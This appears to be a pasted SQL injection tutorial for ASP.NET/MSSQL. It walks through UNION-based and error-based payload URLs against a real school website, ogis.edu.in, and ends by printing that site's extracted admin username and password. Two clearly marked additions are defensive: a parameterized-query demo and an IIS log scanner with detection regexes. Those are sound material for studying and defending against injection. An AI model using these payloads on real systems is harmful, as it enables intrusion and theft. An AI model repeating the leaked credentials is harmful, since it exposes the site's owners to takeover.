ms sql server injection

a guest
Nov 11th, 2018
mssql server injection tutorial
This is how I injected MSSQL Server or .aspx.
vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46

1st way:
Finding version:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)
Finding database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())
I will not go deep into this method. There is already a tutorial about it here.

2nd way:
1. Finding the number of columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -
It loads normally. That's good.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
output:
So let's reduce it.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -
Page loads normally, so there are 9 columns.
2. Next we do UnIOn all seLect.
Remember, in MSSQL with aspx you will never get the vulnerable columns shown; you have to find them manually.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
Don't worry. There are two ways from here.
1 way (easy): this way works rarely and is normal injection.
Just change gid=46 to gid=-46, so the injection will be:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 50983947.jpg]
vul col=2
version=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
@@version gives the version in MSSQL. Remember, version() will not work here.
user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -
You can also use current_user, user, or system_user instead of user_name().
database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
db_name() gives the primary database.
Now replace db_name() with db_name(1), db_name(2), ..., db_name(n) until you have all the databases.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
This gives all databases in one.
Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from information_Schema.tables where table_schema!=db_name()-- -
Here !=db_name() means other than the primary database, so we get the tables of the other databases. The spicy table is o_adminmst.
columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from information_Schema.columns where table_name='o_adminmst'-- -
data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
username=admin
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
pass=admin123#.
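Why the gid=-46 UNION payload above works, and what stops it, as an added example that is not part of the original paste. The page's target is ASP.NET on MS SQL Server; the stand-in below uses Python's sqlite3 only so it runs offline, and the photos/admins tables, their rows and the PAYLOAD string are all constructed. The vulnerable lookup splices the raw gid value into the SQL text, which is exactly what lets a negative id plus a UNION pull rows from an unrelated table; the hardened lookup validates gid as digits and binds it as a parameter, so the same input is rejected before any SQL runs.

```python
import re
import sqlite3

# Constructed stand-in schema (the real page is ASP.NET + MS SQL Server; sqlite3
# is used only so this runs offline). Table and column names and rows are invented.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE photos (gid INTEGER, caption TEXT);
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO photos VALUES (46, 'sports day');
        INSERT INTO admins VALUES ('admin', 'not-a-real-password');
        """
    )
    return conn

# Shape of the tutorial's payload: a negative id so the original SELECT returns
# no row, then a UNION that pulls a column from an unrelated table.
# (sqlite uses || for string concatenation where MS SQL uses +, the %2b trick.)
PAYLOAD = "-46 UNION ALL SELECT username || '/' || password FROM admins -- -"

def vulnerable_lookup(conn: sqlite3.Connection, gid: str) -> list:
    # The pattern behind ViewPhoto.aspx?gid=: the raw query-string value is
    # concatenated into the SQL text, so it can change the statement's structure.
    sql = "SELECT caption FROM photos WHERE gid=" + gid
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn: sqlite3.Connection, gid: str) -> list:
    # 1) Validate: an id is digits only. Rejecting early also stops the
    #    "or 1=cast(@@version as int)" probes, which are not integers either.
    if not re.fullmatch(r"\d{1,9}", gid):
        raise ValueError("gid must be a positive integer")
    # 2) Parameterize: the value is bound by the driver, never spliced into
    #    the statement text, so it cannot become SQL.
    sql = "SELECT caption FROM photos WHERE gid=?"
    return [row[0] for row in conn.execute(sql, (int(gid),))]

def demo() -> dict:
    """Run both lookups against a normal id and against the payload."""
    conn = make_db()
    out = {
        "vuln_normal": vulnerable_lookup(conn, "46"),
        "vuln_payload": vulnerable_lookup(conn, PAYLOAD),
        "safe_normal": safe_lookup(conn, "46"),
    }
    try:
        safe_lookup(conn, PAYLOAD)
        out["safe_payload"] = "accepted"
    except ValueError as exc:
        out["safe_payload"] = f"rejected: {exc}"
    return out

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In the ASP.NET stack itself the same two steps are an `int.TryParse` on the query-string value and a typed `SqlParameter` on the `SqlCommand` (for example `cmd.Parameters.Add("@gid", SqlDbType.Int).Value = gid`). The verbose "Conversion failed when converting ..." messages that the second method below relies on only reach the client when detailed errors are sent to remote users; `<customErrors mode="On">` in web.config keeps them server-side, which does not fix the injection but removes the oracle.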
2nd way (important): This way will work with UnIoN on many sites and in challenges.
Let's say you are stuck here:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
Now replace all columns with NULL, so it will look like:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -
Now start replacing every null with convert(int,@@version) or cast(@@version as int).
In my case, replacing the first null gives the answer.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis ' to data type int.
You can also use current_user, user, or system_user instead of user_name().
database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis ' to data type int.
Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name())),null,null,null,null,null,null,null,null-- -
output=Conversion failed when converting the nvarchar value 'o_updatemst ' to data type int.
For the next table:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name() and table_name<>'o_updatemst')),null,null,null,null,null,null,null,null-- -
output=Conversion failed when converting the nvarchar value 'o_pagemaster ' to data type int.
columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst')),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the nvarchar value 'adminid' to data type int.
For the next column, same as for tables:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst' and column_name<>'adminid')),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the nvarchar value 'username' to data type int.
data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username from o_adminmst)),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin' to data type int.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 password from o_adminmst)),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin123# ' to data type int.
You can use %2b to get the username and password at one time. %2b is the URL encoding of +.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword from o_adminmst)),null,null,null,null,null,null,null,null-- -
Conversion failed when converting the varchar value 'admin/admin123# ' to data type int.
That's it.
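A defender's counterpart to the whole sequence above, as an added example that is not from the original paste: a Python scanner over IIS W3C log lines that decodes the cs-uri-query field the way the server does (including %2b, %20 and inline /**/ comments) and flags the four request shapes this tutorial uses: the column-count `order by N` probe, `UNION ... SELECT`, the `cast`/`convert` to int error trick, and MSSQL-specific names such as @@version, db_name(), user_name() and information_schema. The log excerpt, client IPs and timestamps are constructed; the `#Fields:` list is a trimmed subset of the IIS default.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (fields trimmed). The requests mirror the
# probes in the tutorial; hosts, IPs and timestamps are invented.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2018-11-11 10:00:01 10.0.0.5 GET /ViewPhoto.aspx gid=46 203.0.113.7 200",
    "2018-11-11 10:00:05 10.0.0.5 GET /ViewPhoto.aspx gid=46%20or%201=cast(@@version%20as%20int) 203.0.113.7 500",
    "2018-11-11 10:00:09 10.0.0.5 GET /ViewPhoto.aspx gid=46%20order%20by%2010--%20- 203.0.113.7 500",
    "2018-11-11 10:00:12 10.0.0.5 GET /ViewPhoto.aspx gid=-46%20UNION%20all%20SELECT%201,@@version,3,4,5,6,7,8,9--%20- 203.0.113.7 200",
    "2018-11-11 10:00:20 10.0.0.5 GET /ViewPhoto.aspx gid=46%20UNION/**/all/**/SELECT%20convert(int,(select%20top%201%20table_name%20from%20information_schema.tables)),null,null--%20- 203.0.113.7 500",
    "2018-11-11 10:00:31 10.0.0.5 GET /ViewPhoto.aspx gid=46%20UNION%20all%20SELECT%20convert(int,(select%20top%201%20username%2b%27/%27%2bpassword%20from%20o_adminmst)),null,null--%20- 203.0.113.7 500",
    "2018-11-11 10:01:00 10.0.0.5 GET /Default.aspx - 198.51.100.2 200",
])

# Each rule names one technique from the tutorial. Patterns run against the
# decoded, comment-stripped, lower-cased query string.
RULES = [
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b")),
    ("error_based_cast", re.compile(r"\b(cast|convert)\s*\(\s*(int\s*,|.{0,200}?\bas\s+int\b)")),
    ("mssql_probe", re.compile(r"@@version|\bdb_name\s*\(|\buser_name\s*\(|\bsystem_user\b|\binformation_schema\.")),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+")),
]

def normalize_query(raw: str) -> str:
    """Decode as the server would, drop /* */ comments, fold case and whitespace."""
    decoded = unquote_plus(raw)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", decoded).strip().lower()

def match_rules(query: str) -> list:
    """Names of every rule that fires on an already-normalized query string."""
    return [name for name, rx in RULES if rx.search(query)]

def scan_log(text: str) -> list:
    """One record per request whose query string matches at least one rule."""
    fields, hits = None, []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # truncated or malformed line; W3C fields are space-delimited
        rec = dict(zip(fields, parts))
        query = rec.get("cs-uri-query", "-")
        if query == "-":  # IIS logs "-" when there is no query string
            continue
        rules = match_rules(normalize_query(query))
        if rules:
            hits.append({
                "line": lineno,
                "client": rec.get("c-ip"),
                "uri": rec.get("cs-uri-stem"),
                "status": rec.get("sc-status"),
                "rules": rules,
            })
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Triage order follows the two methods in the tutorial: a `union_select` hit with sc-status 200 means the UNION row was rendered and data may already have left; `error_based_cast` with 500 is the conversion-error oracle, which only works while detailed errors reach the client. `column_count_probe` on its own is low confidence, since many applications legitimately sort through a query-string value, so treat it as a hint to look at the same client's next requests rather than an alert by itself.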